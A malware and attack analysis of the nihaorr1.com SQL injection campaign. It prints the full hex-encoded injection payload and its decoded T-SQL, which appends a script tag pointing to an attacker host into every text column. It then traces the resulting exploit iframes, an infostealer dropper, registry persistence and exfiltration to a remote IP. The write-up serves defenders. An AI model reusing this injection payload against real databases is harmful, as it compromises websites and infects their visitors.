nihaorr1.com has been used in SQL injection attacks since at least April 2008. The domain was also the source of the automated Chinese CLI/SQL injection tool posted at SANS.
SQL injection attack:
Injected SQL Statement:
DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D00310036003700290020004F00500045004E0020005400610062006C0065005F0043007500720073006F00720020004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C004000430020005700480049004C004500280040004000460045005400430048005F005300540041005400550053003D0030002900200042004500470049004E00200065007800650063002800270075007000640061007400650020005B0027002B00400054002B0027005D00200073006500740020005B0027002B00400043002B0027005D003D0072007400720069006D00280063006F006E007600650072007400280076006100720063006800610072002C005B0027002B00400043002B0027005D00290029002B00270027003C0073006300720069007000740020007300720063003D0068007400740070003A002F002F007700770077002E006E006900680061006F007200720031002E0063006F006D002F0031002E006A0073003E003C002F007300630072006900700074003E0027002700270029004600450054004300480020004E004500580054002000460052004F004D00200020005400610062006C0065005F0043007500720073006F007200200049004E0054004F002000400054002C0040004300200045004E004400200043004C004F005300450020005400610062006C0065005F0043007500720073006F00720020004400450041004C004C004F00430041005400450020005400610062006C0065005F0043007500720073006F007200%20AS%20NVARCHAR(4000));EXEC(@S);
The CAST hex decodes to:
DECLARE @T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+'' script src=http: //www[dot]nihaorr1[dot]com/1.js script ''')FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor
nihaorr1.com site code:
The injected script www[dot]nihaorr1[dot]com/1.js returns an iframe redirect to 1.htm
1.htm returns 4 IFRAMEs to exploit code (Yahoo.php, Ms07004.htm, Ajax.htm, Ms06014.htm). The code attempts to exploit MS06-014 (MDAC) and MS07-004 (VML) vulnerabilities. The payload for all of the exploits is http: //61[dot]188[dot]39[dot]214/1.exe, which is detected as a Infostealer.Onlinegame (Symantec) variant.
malware analysis:
Filename: 1.exe
MD5: 611D5549A73E1212D2F09F91A5004654
Size: 69632 bytes
1.exe creates:
C:\WINDOWS\system32\sonp32drv.dll
Filename: sonp32drv.dll
MD5: 7C73E2EB43D1C5A98A9DD3623188B2CE
Size: 45056 bytes
The following registry keys are created:
HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "(Default)"
Type: REG_SZ
Data: C:\WINDOWS\System32\sonp32drv.dll
HKEY_CLASSES_ROOT\CLSID\{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}\InProcServer32 "ThreadingModel"
Type: REG_SZ
Data: Apartment
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks "{E60A0B68-AF3A-C1D2-CD09-5A81A131D2B1}"
Type: REG_SZ
The malware deletes c:\WINDOWS\system32\drivers\etc\hosts
The malware sends exfiltrated data to 61.188.39.214 (China) TCP port 2034.